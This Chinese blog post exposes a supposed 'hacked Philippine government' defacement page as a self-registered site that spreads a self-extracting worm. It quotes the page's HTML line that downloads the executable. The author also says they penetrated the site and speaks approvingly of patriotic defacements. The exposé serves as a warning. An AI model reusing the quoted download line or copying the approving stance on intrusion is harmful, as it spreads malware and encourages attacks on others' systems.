菲律賓事件后,網(wǎng)絡(luò)上鬧的沸沸揚(yáng)揚(yáng),當(dāng)然有一些愛(ài)國(guó)青年,無(wú)論所謂紅客,黑闊,只能說(shuō)做信息安全的,還是做了一定的反擊,當(dāng)然也攻破了部分菲律賓政府的某些網(wǎng)站,當(dāng)然一想起傳說(shuō)中的菲律賓政府被攻破,如果安全圈里的,第一個(gè)能想起的估計(jì)是"小A"了,也不知道這家伙到底哪里高就去,哈哈,一年聯(lián)系不上他了,莫非被和諧了??(好了主題不跑偏說(shuō)正事)
　　當(dāng)紅闊,黑闊攻破菲律賓政府網(wǎng)站的同時(shí)嘛,雖然安全不到位,但是發(fā)現(xiàn)一定會(huì)被改回的,圈內(nèi)如果參與過(guò)"伊朗網(wǎng)軍"反擊戰(zhàn)事件的盆友們,應(yīng)該很了解,攻破,篡改,改回,再篡改的過(guò)程,技術(shù)領(lǐng)域雖然菲律賓政府技術(shù)不到位,但是管理人員改回的能力還是有的,之后很多人就要問(wèn),最近經(jīng)常看到www.pei.net.ph 這個(gè)自稱攻破菲律賓政府網(wǎng)站為什么遲遲沒(méi)有改回呢?而且大肆宣傳呢?其實(shí)很多技術(shù)圈的人都明白這道理,不過(guò)對(duì)于不知道網(wǎng)絡(luò)技術(shù)的人,就過(guò)度的膜拜了,還以為真正遇到傳說(shuō)中的大神,管理員都改不回來(lái)?
　　有技術(shù)的大牛黑站,掛黑頁(yè)走人,留名就好,沒(méi)技術(shù)的,只能想想辦法,用別的來(lái)炒作炒作,當(dāng)然炒作也要有利益的,要么是名義上的利益,要么就是實(shí)際性的利益.當(dāng)然介紹這個(gè)的時(shí)候,我們可以整體分析一下對(duì)于這個(gè)站的基本思路,首先net.ph域名為菲律賓國(guó)家域名沒(méi)錯(cuò),但是其注冊(cè)只需要有一個(gè)可以開(kāi)海外接口的IDC就可以注冊(cè),國(guó)內(nèi)無(wú)法查詢whois 但是國(guó)外接口可以,查詢whois信息,時(shí)間有心的自己查吧,今年的米,呵呵,
分析數(shù)據(jù)一.
　　菲律賓國(guó)家米持有有三種,一種是 .PH 之后是org.PH 最后就是我們看到的net.PH米.(當(dāng)然政府網(wǎng)關(guān)的GOV.PH不放在內(nèi)),我們分析一下網(wǎng)關(guān)地址.可以查詢到網(wǎng)關(guān)為: lamitan.gov.ph ,好吧,雖然IP地址是菲律賓的,但是網(wǎng)關(guān)地址是美國(guó)的,呵呵,這一點(diǎn)我想我們已經(jīng)可以說(shuō)明一些簡(jiǎn)明的問(wèn)題了,四月份的米,注冊(cè)的是菲律賓通用域名,繼續(xù)看下一條!
分析數(shù)據(jù)二.
　　對(duì)整站滲透了一次,除了根目錄的HTML文件,沒(méi)有其它任何文件痕跡,也就是說(shuō)這個(gè)站點(diǎn)上只有這一個(gè)黑頁(yè),要知道真正有技術(shù)的任意一個(gè)技術(shù)圈的,都是不刪除數(shù)據(jù),只掛黑頁(yè)走人的,哪怕對(duì)方多過(guò)分,這是我們自認(rèn)為還算圈內(nèi)自覺(jué)的東西,但是這里只有一個(gè)HTML頁(yè)面,其它的圖片信息都是從懶人圖庫(kù)調(diào)用過(guò)來(lái)的,當(dāng)然這里有閃亮的一點(diǎn),在文件里 有這樣的 一條鏈接chabaoo.cn <PARAM NAME="propDownloadUrl" VALUE="http://www.sulu.gov.ph/admin/cal/135pk.exe"> 本人也算是VB蠕蟲出身,看到這里不用多說(shuō),exe自解壓,呵呵,讓我聯(lián)想到各種遠(yuǎn)控.,呵呵,自解壓,自發(fā)性,350k 蠕蟲病毒, 說(shuō)句實(shí)話,技術(shù)有夠爛的,蠕蟲這么大,如果網(wǎng)速卡點(diǎn)的,還得卡半天,正常蠕蟲如果技術(shù)好點(diǎn)的,做上免殺也應(yīng)該在60K左右,
分析數(shù)據(jù)三
　　查看文件第15行<PARAM NAME="URL" VALUE="http://special.yunnan.cn/feature4/att/site2/20110514/1078d2c3328a0f3898bc4e.mp3"> 之后再查看204行<EMBED src=http://www.7jz8.com/12.mp3 hidden=true type=audio/x-ms-wma LOOP="true" AUTOSTART="true"></EMBED> 我們發(fā)現(xiàn)他寫了兩段的音樂(lè)播放代碼,也就是說(shuō),這個(gè)人連基本的HTML語(yǔ)音都沒(méi)學(xué)明白,一定在網(wǎng)上下載的現(xiàn)成的黑頁(yè)模板,之后就掛上去的,當(dāng)然后面的這句是作廢的,是沒(méi)有用的,
分析數(shù)據(jù)四
　　谷歌搜索,國(guó)外的網(wǎng)站如果年頭久的話都是有GG收錄的,你可以site:www.pei.net.ph 一下,呵呵,答案是沒(méi)收錄,
　　好吧,總結(jié)一下,有人故意做了這樣一個(gè)掛著自解壓病毒的黑頁(yè)獨(dú)立頁(yè)面網(wǎng)站,以黑了菲律賓政府網(wǎng)站為由,用著隨意人就可以注冊(cè)的域名架設(shè)了這樣的一個(gè)站,用以何為?大肆宣傳有多少人中了這135pk?肆意宣傳只是為了更多人的訪問(wèn),多一個(gè)訪問(wèn)就能多抓一只肉雞,很多人不理解為什么殺軟沒(méi)報(bào)毒,如果你現(xiàn)在換成卡巴斯基去查毒,你看能不能查到DIE的蠕蟲病毒,菲律賓政府網(wǎng)站為gov.ph 米,跟中國(guó)的gov.cn 異曲同工, .PH域名國(guó)外接口注冊(cè)80元每年, 獨(dú)立IP VPS,低配1G 正常市場(chǎng)價(jià)格在60 -100元/月,但是換來(lái)的肉雞是多少?每天有多少人來(lái)點(diǎn)擊這個(gè)網(wǎng)站,成為獲益的肉雞呢?

　　飛了賓的網(wǎng)站被黑了是該高興,但是也要看看什么目的是黑站的,對(duì)于這樣的人,我們只能以唾罵來(lái)形容不恥行為,好自為之吧!孩子!
By : Quu

最新評(píng)論